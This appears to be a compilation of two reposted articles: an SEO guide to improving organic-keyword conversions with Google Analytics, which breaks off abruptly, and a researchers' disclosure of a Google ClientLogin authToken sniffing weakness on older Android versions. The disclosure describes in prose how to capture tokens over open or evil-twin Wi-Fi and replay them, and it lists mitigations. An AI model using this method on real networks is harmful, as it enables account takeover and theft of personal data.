How To Increase Conversions For Organic Keywords

Courtesy: http://searchengineland.com/how-to-increase-conversions-for-organic-keywords-75649
 
Once your website starts getting at least some traffic from organic search queries, you can help increase conversions (inquiries, signups, purchases, phone calls etc) by investigating what happens once people reach your website from the search results.
You can use Google Analytics to choose what keywords to focus on and to check the entrance pages (landing pages) for issues hurting conversions.

How To Choose Which Organic Keywords To Focus On

Most websites have hundreds or thousands of keywords bringing visitors to their website so it’s ideal to have an easy way to select which keywords to focus on.
In Google Analytics, you should have either some important (non-ecommerce) conversion Goals being tracked or e-commerce turned on and set up so that it is tracking transactions. You’ll then be able to see the conversion rates by keyword as follows:

1. Choose Traffic Sources / Keywords
2. Set a date range of about 3 to 6 months (Less if you’ve made a fair number of changes to the site that might have affected rankings, changed URL’s etc)
3. Choose “Show: non-paid” (See the screen shot below)
4. Then choose either a Goal Set tab or the Ecommerce tab (see the screen shot below)

Sort on Visits if needed by clicking on the column title (or export to a spreadsheet so you can sort the data in various ways).

Google Analytics Organic Keyword Conversion Rates

Scan through the list and more closely examine any keywords with a conversion rate that is lower than some minimal percentage.
You’ll likely notice a fair number of keywords with a conversion rate of zero. You’ll need to make a judgment call on each of these as to whether the phrase is relevant to the conversion goals of your site.
Sites tend to rank for many phrases that aren’t very relevant and are not likely to lead to conversions. Skip those and focus on the keyword phrases that you believe should be leading to conversions.

Check The Entrance Pages For Issues

Although we have some control through optimization, it’s the search engines that decide what web pages rank high for organic keywords and thus become the entrance pages when people click through (unlike PPC where you choose the landing page) so the first step is to check any entrance page with more than a minimal number of entrances for issues.

• In the Google Analytics table of keywords you generated, click on a keyword in the table that you want to examine.
• Next, click on the drop down selector you’ll see in the screen shot below

• Then select Landing Page (see in the screen shot below):

You’ll be presented with a list of the entrance pages for that keyword (You may have to click “non-paid” again on this page too).
Unfortunately, Google Analytics doesn’t turn the entrance page listings into links in this table, so you’ll either need to copy and append the URL segment in the listing to the website address in a browser address bar or follow the next steps.
Here’s what I do using two monitors. I open Analytics again in another instance of the browser on the other monitor and do the following:

1. Choose Content / Top Landing Pages
2. Select “containing” in the Filter option selector you’ll see in the screen shot below.
3. Copy all or part of the URL segment from the keyword entrance page listing into the Filter field (see the screen shot below)
4. This will generate a list of entrance pages that contain the URL segment.
5. Click on the entrance page you want to examine.

Google Analytics Landing Pages Filter

When you click on the landing page you wish to examine a Content Detail page is presented. Click on the “visit this page” link you’ll see in the screen shot below to view the page.

Typical Issues With Organic Entrance Pages

Here are some typical issues we see with organic entrance pages along with some suggestions on how to handle them.
Files with no navigation
We often see the content of frames (albeit less often these days) or orphaned “pages”, or the content from pop-up windows get indexed in search engines and viewed without any site navigation. In other words, people are clicking on the search results for these files and the page that they land on has no easy way for them to navigate into the rest of the web site.
For framed pages (if you still have this issue) determine if they really need to be developed as a frames system and rebuild them if not. There are also some JavaScript solutions to ensure that frames pages load correctly. Trying Binging “JavaScript ensure frames load correctly”.
Consider not using pop-up windows or putting the content of pop-up windows into a folder and disallow that folder in your robots.txt file. Recheck what entrance pages are being returned after a couple of months.
Old web pages still live
Webmasters often leave old web pages up on the site where they continue to get indexed by search engine. Many times I’ve seen entire old versions of websites moved to a folder on the site, but search engines find and index them. Sometimes, these old pages rank for important keywords.
Unfortunately, old web pages usually have broken navigation links and images, out of date information, and countless other issues. Consider setting up a 301 redirect from the old page(s) to the best page on the live site to capture that keyword traffic for awhile. Then work to optimize a page(s) on the live site for the keywords.
File not found
You may get “404 file not found” errors for many reasons. You’ll need to determine why this is happening for specific keyword phrases to decide if there are issues that need to be addressed. In some cases “file not found” errors are returned from search results because a web page was deleted or moved and the search engines haven’t removed the old URL from their listings yet.
Setup a 301 redirect for this URL to the best page on the live site. Recheck what entrance pages are being returned for the keywords wtihin a couple of weeks or months.

Is This The Best Entrance Page For The Keyword Phrase?

If there are no issues with an entrance page such as those pointed out in the previous section, consider whether it’s the best page for people to enter the site for this search query. The fact that you are examining the entrance page for this keyword phrase because the conversion rate is low would suggest that it may not be the best entrance page.
Here’s an example from a client’s site. They sell cooking products on their e-commerce website. They also publish their own book on a specific cooking topic which they sell on the site. People do search on the name of the book.
However, the top entrance page, the page ranking highest for the name of the book, was a page for a free recipe from the book. Not only was there no easy way to get to the page where one could by the book, nowhere on the page was it even mentioned that the book was for sale.

The Insecurity of Google's ClientLogin Protocol

Courtesy: Bastian Könings, Jens Nickels, and Florian Schaub
http://www.uni-ulm.de/en/in/mi/staff/koenings/catching-authtokens.html

In a recent blog post Dan Wallach outlined some of the risks of using Android smartphones in open Wifi networks. He found that some Android applications transmit data in the clear, allowing an attacker to eavesdrop any transmitted information. Besides third-party apps, such as Twitter or Facebook, also the Google Calendar app transmitted unencrypted information. Wallach stated that "an eavesdropper can definitely see your calendar transactions and can likely impersonate you to Google Calendar". A fact that also applies to Google Contacts as another blog post revealed.
We wanted to know if it is really possible to launch an impersonation attack against Google services and started our own analysis. The short answer is: Yes, it is possible, and it is quite easy to do so. Further, the attack is not limited to Google Calendar and Contacts, but is theoretically feasible with all Google services using the ClientLogin authentication protocol for access to its data APIs.
ClientLogin is meant to be used for authentication by installed applications and Android apps. Basically, to use ClientLogin, an application needs to request an authentication token (authToken) from the Google service by passing an account name and password via a https connection. The returned authToken can be used for any subsequent request to the service API and is valid for a maximum duration of 2 weeks. However, if this authToken is used in requests send over unencrypted http, an adversary can easily sniff the authToken (e.g. with Wireshark, see screenshot below). Because the authToken is not bound to any session or device specific information the adversary  can subsequently use the captured authToken to access any personal data which is made available through the service API. For instance, the adversary can gain full access to the calendar, contacts information, or private web albums of the respective Google user. This means that the adversary can view, modify or delete any contacts, calendar events, or private pictures. This is not limited to items currently being synced but affects all items of that user.
The attack is very similar to stealing session cookies of websites (Sidejacking). The feasibility of Sidejacking attacks against well-known websites such as Facebook or Twitter, has lately been demonstrated by the Firesheep plugin which attracted a lot of attention.

Screenshot of Wireshark showing the authToken for ClientLogin in a data API request to the Picasa Web Albums service.

Scope

We tested this attack with Android versions 2.1 (Nexus One), 2.2 (HTC Desire, Nexus One), 2.2.1 (HTC Incredible S), 2.3.3 (Nexus One), 2.3.4 (HTC Desire, Nexus One), and 3.0 (Motorola XOOM) and with the native Google Calendar, Google Contacts, and Gallery apps (or respective synchronization services).

• Until Android 2.3.3 the Calendar and Contacts apps transmit any request in the clear via http and are therefore vulnerable to the authToken attack. This affects 99.7% of all Android smartphones (stats from 2nd of May 2011). Since Android 2.3 the Gallery app provides Picasa Web Albums synchronization which is also not encrypted.
• Since Android 2.3.4, the Calendar and Contacts apps are using a secure https connection. However, the Picasa synchronization is still using http and thus is still vulnerable.
• Our sniffed authTokens were valid for several days (14 days for a sniffed Calendar authToken), which enables adversaries to comfortably capture and make use of tokens at different times and locations.

Use of HTTPS in Android Google Apps:

Android version	Calendar Sync	Contacts Sync	Picasa Sync (Gallery)
3.0	yes	yes	?
2.3.4	yes	yes	no
2.3.3	no	no	no
2.2.1	no	no	n/a
2.2	no	no	n/a
2.1	no	no	n/a

Note that this vulnerability is not limited to standard Android apps but pertains to any Android apps and also desktop applications that make use of Google services via the ClientLogin protocol over HTTP rather than HTTPS. For example, the Google Calendar provider for Thunderbird if Google Calendar URLs are used without leading "https".

Collecting authTokens

To collect such authTokens on a large scale an adversary could setup a wifi access point with a common SSID (evil twin) of an unencrypted wireless network, e.g., T-Mobile, attwifi, starbucks. With default settings, Android phones automatically connect to a previously known network and many apps will attempt syncing immediately. While syncing would fail (unless the adversary forwards the requests), the adversary would capture authTokens for each service that attempted syncing. Due to the long lifetime of authTokens, the adversary can comfortably capture a large number of tokens and make use of them later on from a different location.

Implications

The implications of this vulnerability reach from disclosure to loss of personal information for the Calendar data. For Contact information, private information of others is also affected, potentially including phone numbers, home addresses, and email addresses. Beyond the mere stealing of such information, an adversary could perform subtle changes without the user noticing. For example, an adversary could change the stored email address of the victim's boss or business partners hoping to receive sensitive or confidential material pertaining to their business.

Fixing the issue

What app developers can do:

• Android apps and synchronization services using ClientLogin should immediately switch to https. In the newest Android release (2.3.4) this step was already taken for the Google Calendar and Contacts apps, but other apps need to follow. The Gallery app is developed by Cooliris who probably were not made aware of the issue. However, the Android security team told us that they are investigating the Gallery app as well. So hopefully a fix should be integrated in the next release.
• Google APIs offer more secure authentication services. Switching to oAuth for authentication would mitigate the authToken capture issue. Https should be used in addition to prevent synced data to be transmitted in the clear.

What Google/Android can do:

• The lifetime of an authToken should be drastically limited.
• Google services could reject ClientLogin based requests from insecure http connections to enforce use of https. Https is already required for the Google Docs API und will be required for Google Spreadsheet and Google Sites APIs in September 2011. It should be mandatory for all of Google's data APIs.
• Automatically connecting to known Wifi-networks could be limited to protected networks. At least a respective option should be provided to users.

What Android users can do:

• Update to Android 2.3.4. Update your phone to the current Android version as soon as possible. However, depending on your phone vendor you may have to wait weeks/months before an update is available for your phone. Hopefully this will change in the future. 
• Switch off automatic synchronization in the settings menu when connecting with open Wifi networks.
• Let your device forget an open network you previously connected to, to prevent automatic reconnection (long press network name and select forget)
• The best protection at the moment is to avoid open Wifi networks at all when using affected apps.